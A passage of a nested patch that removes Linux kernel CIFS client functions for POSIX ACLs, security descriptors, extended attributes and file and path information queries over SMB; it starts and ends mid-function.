+-		/* BB also check enough total bytes returned */
+-		if (rc || get_bcc(&pSMBr->hdr) < 2)
+-			rc = -EIO;      /* bad smb */
+-		else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			__u16 count = le16_to_cpu(pSMBr->t2.DataCount);
+-			rc = cifs_copy_posix_acl(acl_inf,
+-				(char *)&pSMBr->hdr.Protocol+data_offset,
+-				buflen, acl_type, count);
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto queryAclRetry;
+-	return rc;
+-}
+-
+-int
+-CIFSSMBSetPosixACL(const unsigned int xid, struct cifs_tcon *tcon,
+-		   const unsigned char *fileName,
+-		   const char *local_acl, const int buflen,
+-		   const int acl_type,
+-		   const struct nls_table *nls_codepage, int remap)
+-{
+-	struct smb_com_transaction2_spi_req *pSMB = NULL;
+-	struct smb_com_transaction2_spi_rsp *pSMBr = NULL;
+-	char *parm_data;
+-	int name_len;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, byte_count, data_count, param_offset, offset;
+-
+-	cifs_dbg(FYI, "In SetPosixACL (Unix) for path %s\n", fileName);
+-setAclRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-			cifsConvertToUTF16((__le16 *) pSMB->FileName, fileName,
+-					   PATH_MAX, nls_codepage, remap);
+-		name_len++;     /* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, fileName);
+-	}
+-	params = 6 + name_len;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find max SMB size from sess */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-	parm_data = ((char *) &pSMB->hdr.Protocol) + offset;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-
+-	/* convert to on the wire format for POSIX ACL */
+-	data_count = ACL_to_cifs_posix(parm_data, local_acl, buflen, acl_type);
+-
+-	if (data_count == 0) {
+-		rc = -EOPNOTSUPP;
+-		goto setACLerrorExit;
+-	}
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_SET_POSIX_ACL);
+-	byte_count = 3 /* pad */  + params + data_count;
+-	pSMB->DataCount = cpu_to_le16(data_count);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc)
+-		cifs_dbg(FYI, "Set POSIX ACL returned %d\n", rc);
+-
+-setACLerrorExit:
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto setAclRetry;
+-	return rc;
+-}
+-
+-int
+-CIFSGetExtAttr(const unsigned int xid, struct cifs_tcon *tcon,
+-	       const int netfid, __u64 *pExtAttrBits, __u64 *pMask)
+-{
+-	int rc = 0;
+-	struct smb_t2_qfi_req *pSMB = NULL;
+-	struct smb_t2_qfi_rsp *pSMBr = NULL;
+-	int bytes_returned;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In GetExtAttr\n");
+-	if (tcon == NULL)
+-		return -ENODEV;
+-
+-GetExtAttrRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2 /* level */ + 2 /* fid */;
+-	pSMB->t2.TotalDataCount = 0;
+-	pSMB->t2.MaxParameterCount = cpu_to_le16(4);
+-	/* BB find exact max data count below from sess structure BB */
+-	pSMB->t2.MaxDataCount = cpu_to_le16(4000);
+-	pSMB->t2.MaxSetupCount = 0;
+-	pSMB->t2.Reserved = 0;
+-	pSMB->t2.Flags = 0;
+-	pSMB->t2.Timeout = 0;
+-	pSMB->t2.Reserved2 = 0;
+-	pSMB->t2.ParameterOffset = cpu_to_le16(offsetof(struct smb_t2_qfi_req,
+-					       Fid) - 4);
+-	pSMB->t2.DataCount = 0;
+-	pSMB->t2.DataOffset = 0;
+-	pSMB->t2.SetupCount = 1;
+-	pSMB->t2.Reserved3 = 0;
+-	pSMB->t2.SubCommand = cpu_to_le16(TRANS2_QUERY_FILE_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->t2.TotalParameterCount = cpu_to_le16(params);
+-	pSMB->t2.ParameterCount = pSMB->t2.TotalParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_ATTR_FLAGS);
+-	pSMB->Pad = 0;
+-	pSMB->Fid = netfid;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->t2.ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "error %d in GetExtAttr\n", rc);
+-	} else {
+-		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-		/* BB also check enough total bytes returned */
+-		if (rc || get_bcc(&pSMBr->hdr) < 2)
+-			/* If rc should we check for EOPNOSUPP and
+-			   disable the srvino flag? or in caller? */
+-			rc = -EIO;      /* bad smb */
+-		else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			__u16 count = le16_to_cpu(pSMBr->t2.DataCount);
+-			struct file_chattr_info *pfinfo;
+-
+-			if (count != 16) {
+-				cifs_dbg(FYI, "Invalid size ret in GetExtAttr\n");
+-				rc = -EIO;
+-				goto GetExtAttrOut;
+-			}
+-			pfinfo = (struct file_chattr_info *)
+-				 (data_offset + (char *) &pSMBr->hdr.Protocol);
+-			*pExtAttrBits = le64_to_cpu(pfinfo->mode);
+-			*pMask = le64_to_cpu(pfinfo->mask);
+-		}
+-	}
+-GetExtAttrOut:
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto GetExtAttrRetry;
+-	return rc;
+-}
+-
+-#endif /* CONFIG_POSIX */
+-
+-/*
+- * Initialize NT TRANSACT SMB into small smb request buffer.  This assumes that
+- * all NT TRANSACTS that we init here have total parm and data under about 400
+- * bytes (to fit in small cifs buffer size), which is the case so far, it
+- * easily fits. NB: Setup words themselves and ByteCount MaxSetupCount (size of
+- * returned setup area) and MaxParameterCount (returned parms size) must be set
+- * by caller
+- */
+-static int
+-smb_init_nttransact(const __u16 sub_command, const int setup_count,
+-		   const int parm_len, struct cifs_tcon *tcon,
+-		   void **ret_buf)
+-{
+-	int rc;
+-	__u32 temp_offset;
+-	struct smb_com_ntransact_req *pSMB;
+-
+-	rc = small_smb_init(SMB_COM_NT_TRANSACT, 19 + setup_count, tcon,
+-				(void **)&pSMB);
+-	if (rc)
+-		return rc;
+-	*ret_buf = (void *)pSMB;
+-	pSMB->Reserved = 0;
+-	pSMB->TotalParameterCount = cpu_to_le32(parm_len);
+-	pSMB->TotalDataCount  = 0;
+-	pSMB->MaxDataCount = cpu_to_le32(CIFSMaxBufSize & 0xFFFFFF00);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->DataCount  = pSMB->TotalDataCount;
+-	temp_offset = offsetof(struct smb_com_ntransact_req, Parms) +
+-			(setup_count * 2) - 4 /* for rfc1001 length itself */;
+-	pSMB->ParameterOffset = cpu_to_le32(temp_offset);
+-	pSMB->DataOffset = cpu_to_le32(temp_offset + parm_len);
+-	pSMB->SetupCount = setup_count; /* no need to le convert byte fields */
+-	pSMB->SubCommand = cpu_to_le16(sub_command);
+-	return 0;
+-}
+-
+-static int
+-validate_ntransact(char *buf, char **ppparm, char **ppdata,
+-		   __u32 *pparmlen, __u32 *pdatalen)
+-{
+-	char *end_of_smb;
+-	__u32 data_count, data_offset, parm_count, parm_offset;
+-	struct smb_com_ntransact_rsp *pSMBr;
+-	u16 bcc;
+-
+-	*pdatalen = 0;
+-	*pparmlen = 0;
+-
+-	if (buf == NULL)
+-		return -EINVAL;
+-
+-	pSMBr = (struct smb_com_ntransact_rsp *)buf;
+-
+-	bcc = get_bcc(&pSMBr->hdr);
+-	end_of_smb = 2 /* sizeof byte count */ + bcc +
+-			(char *)&pSMBr->ByteCount;
+-
+-	data_offset = le32_to_cpu(pSMBr->DataOffset);
+-	data_count = le32_to_cpu(pSMBr->DataCount);
+-	parm_offset = le32_to_cpu(pSMBr->ParameterOffset);
+-	parm_count = le32_to_cpu(pSMBr->ParameterCount);
+-
+-	*ppparm = (char *)&pSMBr->hdr.Protocol + parm_offset;
+-	*ppdata = (char *)&pSMBr->hdr.Protocol + data_offset;
+-
+-	/* should we also check that parm and data areas do not overlap? */
+-	if (*ppparm > end_of_smb) {
+-		cifs_dbg(FYI, "parms start after end of smb\n");
+-		return -EINVAL;
+-	} else if (parm_count + *ppparm > end_of_smb) {
+-		cifs_dbg(FYI, "parm end after end of smb\n");
+-		return -EINVAL;
+-	} else if (*ppdata > end_of_smb) {
+-		cifs_dbg(FYI, "data starts after end of smb\n");
+-		return -EINVAL;
+-	} else if (data_count + *ppdata > end_of_smb) {
+-		cifs_dbg(FYI, "data %p + count %d (%p) past smb end %p start %p\n",
+-			 *ppdata, data_count, (data_count + *ppdata),
+-			 end_of_smb, pSMBr);
+-		return -EINVAL;
+-	} else if (parm_count + data_count > bcc) {
+-		cifs_dbg(FYI, "parm count and data count larger than SMB\n");
+-		return -EINVAL;
+-	}
+-	*pdatalen = data_count;
+-	*pparmlen = parm_count;
+-	return 0;
+-}
+-
+-/* Get Security Descriptor (by handle) from remote server for a file or dir */
+-int
+-CIFSSMBGetCIFSACL(const unsigned int xid, struct cifs_tcon *tcon, __u16 fid,
+-		  struct cifs_ntsd **acl_inf, __u32 *pbuflen)
+-{
+-	int rc = 0;
+-	int buf_type = 0;
+-	QUERY_SEC_DESC_REQ *pSMB;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-
+-	cifs_dbg(FYI, "GetCifsACL\n");
+-
+-	*pbuflen = 0;
+-	*acl_inf = NULL;
+-
+-	rc = smb_init_nttransact(NT_TRANSACT_QUERY_SECURITY_DESC, 0,
+-			8 /* parm len */, tcon, (void **) &pSMB);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->MaxParameterCount = cpu_to_le32(4);
+-	/* BB TEST with big acls that might need to be e.g. larger than 16K */
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Fid = fid; /* file handle always le */
+-	pSMB->AclFlags = cpu_to_le32(CIFS_ACL_OWNER | CIFS_ACL_GROUP |
+-				     CIFS_ACL_DACL);
+-	pSMB->ByteCount = cpu_to_le16(11); /* 3 bytes pad + 8 bytes parm */
+-	inc_rfc1001_len(pSMB, 11);
+-	iov[0].iov_base = (char *)pSMB;
+-	iov[0].iov_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 4;
+-
+-	rc = SendReceive2(xid, tcon->ses, iov, 1 /* num iovec */, &buf_type,
+-			  0, &rsp_iov);
+-	cifs_small_buf_release(pSMB);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_acl_get);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QuerySecDesc = %d\n", rc);
+-	} else {                /* decode response */
+-		__le32 *parm;
+-		__u32 parm_len;
+-		__u32 acl_len;
+-		struct smb_com_ntransact_rsp *pSMBr;
+-		char *pdata;
+-
+-/* validate_nttransact */
+-		rc = validate_ntransact(rsp_iov.iov_base, (char **)&parm,
+-					&pdata, &parm_len, pbuflen);
+-		if (rc)
+-			goto qsec_out;
+-		pSMBr = (struct smb_com_ntransact_rsp *)rsp_iov.iov_base;
+-
+-		cifs_dbg(FYI, "smb %p parm %p data %p\n",
+-			 pSMBr, parm, *acl_inf);
+-
+-		if (le32_to_cpu(pSMBr->ParameterCount) != 4) {
+-			rc = -EIO;      /* bad smb */
+-			*pbuflen = 0;
+-			goto qsec_out;
+-		}
+-
+-/* BB check that data area is minimum length and as big as acl_len */
+-
+-		acl_len = le32_to_cpu(*parm);
+-		if (acl_len != *pbuflen) {
+-			cifs_dbg(VFS, "acl length %d does not match %d\n",
+-				 acl_len, *pbuflen);
+-			if (*pbuflen > acl_len)
+-				*pbuflen = acl_len;
+-		}
+-
+-		/* check if buffer is big enough for the acl
+-		   header followed by the smallest SID */
+-		if ((*pbuflen < sizeof(struct cifs_ntsd) + 8) ||
+-		    (*pbuflen >= 64 * 1024)) {
+-			cifs_dbg(VFS, "bad acl length %d\n", *pbuflen);
+-			rc = -EINVAL;
+-			*pbuflen = 0;
+-		} else {
+-			*acl_inf = kmemdup(pdata, *pbuflen, GFP_KERNEL);
+-			if (*acl_inf == NULL) {
+-				*pbuflen = 0;
+-				rc = -ENOMEM;
+-			}
+-		}
+-	}
+-qsec_out:
+-	free_rsp_buf(buf_type, rsp_iov.iov_base);
+-	return rc;
+-}
+-
+-int
+-CIFSSMBSetCIFSACL(const unsigned int xid, struct cifs_tcon *tcon, __u16 fid,
+-			struct cifs_ntsd *pntsd, __u32 acllen, int aclflag)
+-{
+-	__u16 byte_count, param_count, data_count, param_offset, data_offset;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	SET_SEC_DESC_REQ *pSMB = NULL;
+-	void *pSMBr;
+-
+-setCifsAclRetry:
+-	rc = smb_init(SMB_COM_NT_TRANSACT, 19, tcon, (void **) &pSMB, &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-
+-	param_count = 8;
+-	param_offset = offsetof(struct smb_com_transaction_ssec_req, Fid) - 4;
+-	data_count = acllen;
+-	data_offset = param_offset + param_count;
+-	byte_count = 3 /* pad */  + param_count;
+-
+-	pSMB->DataCount = cpu_to_le32(data_count);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->MaxParameterCount = cpu_to_le32(4);
+-	pSMB->MaxDataCount = cpu_to_le32(16384);
+-	pSMB->ParameterCount = cpu_to_le32(param_count);
+-	pSMB->ParameterOffset = cpu_to_le32(param_offset);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->DataOffset = cpu_to_le32(data_offset);
+-	pSMB->SetupCount = 0;
+-	pSMB->SubCommand = cpu_to_le16(NT_TRANSACT_SET_SECURITY_DESC);
+-	pSMB->ByteCount = cpu_to_le16(byte_count+data_count);
+-
+-	pSMB->Fid = fid; /* file handle always le */
+-	pSMB->Reserved2 = 0;
+-	pSMB->AclFlags = cpu_to_le32(aclflag);
+-
+-	if (pntsd && acllen) {
+-		memcpy((char *)pSMBr + offsetof(struct smb_hdr, Protocol) +
+-				data_offset, pntsd, acllen);
+-		inc_rfc1001_len(pSMB, byte_count + data_count);
+-	} else
+-		inc_rfc1001_len(pSMB, byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-
+-	cifs_dbg(FYI, "SetCIFSACL bytes_returned: %d, rc: %d\n",
+-		 bytes_returned, rc);
+-	if (rc)
+-		cifs_dbg(FYI, "Set CIFS ACL returned %d\n", rc);
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto setCifsAclRetry;
+-
+-	return (rc);
+-}
+-
+-
+-/* Legacy Query Path Information call for lookup to old servers such
+-   as Win9x/WinME */
+-int
+-SMBQueryInformation(const unsigned int xid, struct cifs_tcon *tcon,
+-		    const char *search_name, FILE_ALL_INFO *data,
+-		    const struct nls_table *nls_codepage, int remap)
+-{
+-	QUERY_INFORMATION_REQ *pSMB;
+-	QUERY_INFORMATION_RSP *pSMBr;
+-	int rc = 0;
+-	int bytes_returned;
+-	int name_len;
+-
+-	cifs_dbg(FYI, "In SMBQPath path %s\n", search_name);
+-QInfRetry:
+-	rc = smb_init(SMB_COM_QUERY_INFORMATION, 0, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-			cifsConvertToUTF16((__le16 *) pSMB->FileName,
+-					   search_name, PATH_MAX, nls_codepage,
+-					   remap);
+-		name_len++;     /* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, search_name);
+-	}
+-	pSMB->BufferFormat = 0x04;
+-	name_len++; /* account for buffer type byte */
+-	inc_rfc1001_len(pSMB, (__u16)name_len);
+-	pSMB->ByteCount = cpu_to_le16(name_len);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QueryInfo = %d\n", rc);
+-	} else if (data) {
+-		struct timespec64 ts;
+-		__u32 time = le32_to_cpu(pSMBr->last_write_time);
+-
+-		/* decode response */
+-		/* BB FIXME - add time zone adjustment BB */
+-		memset(data, 0, sizeof(FILE_ALL_INFO));
+-		ts.tv_nsec = 0;
+-		ts.tv_sec = time;
+-		/* decode time fields */
+-		data->ChangeTime = cpu_to_le64(cifs_UnixTimeToNT(ts));
+-		data->LastWriteTime = data->ChangeTime;
+-		data->LastAccessTime = 0;
+-		data->AllocationSize =
+-			cpu_to_le64(le32_to_cpu(pSMBr->size));
+-		data->EndOfFile = data->AllocationSize;
+-		data->Attributes =
+-			cpu_to_le32(le16_to_cpu(pSMBr->attr));
+-	} else
+-		rc = -EIO; /* bad buffer passed in */
+-
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto QInfRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBQFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		 u16 netfid, FILE_ALL_INFO *pFindData)
+-{
+-	struct smb_t2_qfi_req *pSMB = NULL;
+-	struct smb_t2_qfi_rsp *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned;
+-	__u16 params, byte_count;
+-
+-QFileInfoRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2 /* level */ + 2 /* fid */;
+-	pSMB->t2.TotalDataCount = 0;
+-	pSMB->t2.MaxParameterCount = cpu_to_le16(4);
+-	/* BB find exact max data count below from sess structure BB */
+-	pSMB->t2.MaxDataCount = cpu_to_le16(CIFSMaxBufSize);
+-	pSMB->t2.MaxSetupCount = 0;
+-	pSMB->t2.Reserved = 0;
+-	pSMB->t2.Flags = 0;
+-	pSMB->t2.Timeout = 0;
+-	pSMB->t2.Reserved2 = 0;
+-	pSMB->t2.ParameterOffset = cpu_to_le16(offsetof(struct smb_t2_qfi_req,
+-					       Fid) - 4);
+-	pSMB->t2.DataCount = 0;
+-	pSMB->t2.DataOffset = 0;
+-	pSMB->t2.SetupCount = 1;
+-	pSMB->t2.Reserved3 = 0;
+-	pSMB->t2.SubCommand = cpu_to_le16(TRANS2_QUERY_FILE_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->t2.TotalParameterCount = cpu_to_le16(params);
+-	pSMB->t2.ParameterCount = pSMB->t2.TotalParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_ALL_INFO);
+-	pSMB->Pad = 0;
+-	pSMB->Fid = netfid;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->t2.ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QFileInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc) /* BB add auto retry on EOPNOTSUPP? */
+-			rc = -EIO;
+-		else if (get_bcc(&pSMBr->hdr) < 40)
+-			rc = -EIO;	/* bad smb */
+-		else if (pFindData) {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			memcpy((char *) pFindData,
+-			       (char *) &pSMBr->hdr.Protocol +
+-			       data_offset, sizeof(FILE_ALL_INFO));
+-		} else
+-		    rc = -ENOMEM;
+-	}
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto QFileInfoRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBQPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		 const char *search_name, FILE_ALL_INFO *data,
+-		 int legacy /* old style infolevel */,
+-		 const struct nls_table *nls_codepage, int remap)
+-{
+-	/* level 263 SMB_QUERY_FILE_ALL_INFO */
+-	TRANSACTION2_QPI_REQ *pSMB = NULL;
+-	TRANSACTION2_QPI_RSP *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned;
+-	int name_len;
+-	__u16 params, byte_count;
+-
+-	/* cifs_dbg(FYI, "In QPathInfo path %s\n", search_name); */
+-QPathInfoRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, search_name,
+-				       PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, search_name);
+-	}
+-
+-	params = 2 /* level */ + 4 /* reserved */ + name_len /* includes NUL */;
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(4000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-	struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	if (legacy)
+-		pSMB->InformationLevel = cpu_to_le16(SMB_INFO_STANDARD);
+-	else
+-		pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_ALL_INFO);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QPathInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc) /* BB add auto retry on EOPNOTSUPP? */
+-			rc = -EIO;
+-		else if (!legacy && get_bcc(&pSMBr->hdr) < 40)
+-			rc = -EIO;	/* bad smb */
+-		else if (legacy && get_bcc(&pSMBr->hdr) < 24)
+-			rc = -EIO;  /* 24 or 26 expected but we do not read
+-					last field */
+-		else if (data) {
+-			int size;
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-
+-			/*
+-			 * On legacy responses we do not read the last field,
+-			 * EAsize, fortunately since it varies by subdialect and
+-			 * also note it differs on Set vs Get, ie two bytes or 4
+-			 * bytes depending but we don't care here.
+-			 */
+-			if (legacy)
+-				size = sizeof(FILE_INFO_STANDARD);
+-			else
+-				size = sizeof(FILE_ALL_INFO);
+-			memcpy((char *) data, (char *) &pSMBr->hdr.Protocol +
+-			       data_offset, size);
+-		} else
+-		    rc = -ENOMEM;
+-	}
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto QPathInfoRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBUnixQFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		 u16 netfid, FILE_UNIX_BASIC_INFO *pFindData)
+-{
+-	struct smb_t2_qfi_req *pSMB = NULL;
+-	struct smb_t2_qfi_rsp *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned;
+-	__u16 params, byte_count;
+-
+-UnixQFileInfoRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2 /* level */ + 2 /* fid */;
+-	pSMB->t2.TotalDataCount = 0;
+-	pSMB->t2.MaxParameterCount = cpu_to_le16(4);
+-	/* BB find exact max data count below from sess structure BB */
+-	pSMB->t2.MaxDataCount = cpu_to_le16(CIFSMaxBufSize);
+-	pSMB->t2.MaxSetupCount = 0;
+-	pSMB->t2.Reserved = 0;
+-	pSMB->t2.Flags = 0;
+-	pSMB->t2.Timeout = 0;
+-	pSMB->t2.Reserved2 = 0;
+-	pSMB->t2.ParameterOffset = cpu_to_le16(offsetof(struct smb_t2_qfi_req,
+-					       Fid) - 4);
+-	pSMB->t2.DataCount = 0;
+-	pSMB->t2.DataOffset = 0;
+-	pSMB->t2.SetupCount = 1;
+-	pSMB->t2.Reserved3 = 0;
+-	pSMB->t2.SubCommand = cpu_to_le16(TRANS2_QUERY_FILE_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->t2.TotalParameterCount = cpu_to_le16(params);
+-	pSMB->t2.ParameterCount = pSMB->t2.TotalParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_UNIX_BASIC);
+-	pSMB->Pad = 0;
+-	pSMB->Fid = netfid;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->t2.ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in UnixQFileInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) < sizeof(FILE_UNIX_BASIC_INFO)) {
+-			cifs_dbg(VFS, "Malformed FILE_UNIX_BASIC_INFO response. Unix Extensions can be disabled on mount by specifying the nosfu mount option.\n");
+-			rc = -EIO;	/* bad smb */
+-		} else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			memcpy((char *) pFindData,
+-			       (char *) &pSMBr->hdr.Protocol +
+-			       data_offset,
+-			       sizeof(FILE_UNIX_BASIC_INFO));
+-		}
+-	}
+-
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto UnixQFileInfoRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBUnixQPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		     const unsigned char *searchName,
+-		     FILE_UNIX_BASIC_INFO *pFindData,
+-		     const struct nls_table *nls_codepage, int remap)
+-{
+-/* SMB_QUERY_FILE_UNIX_BASIC */
+-	TRANSACTION2_QPI_REQ *pSMB = NULL;
+-	TRANSACTION2_QPI_RSP *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	int name_len;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In QPathInfo (Unix) the path %s\n", searchName);
+-UnixQPathInfoRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, searchName,
+-				       PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, searchName);
+-	}
+-
+-	params = 2 /* level */ + 4 /* reserved */ + name_len /* includes NUL */;
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(4000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
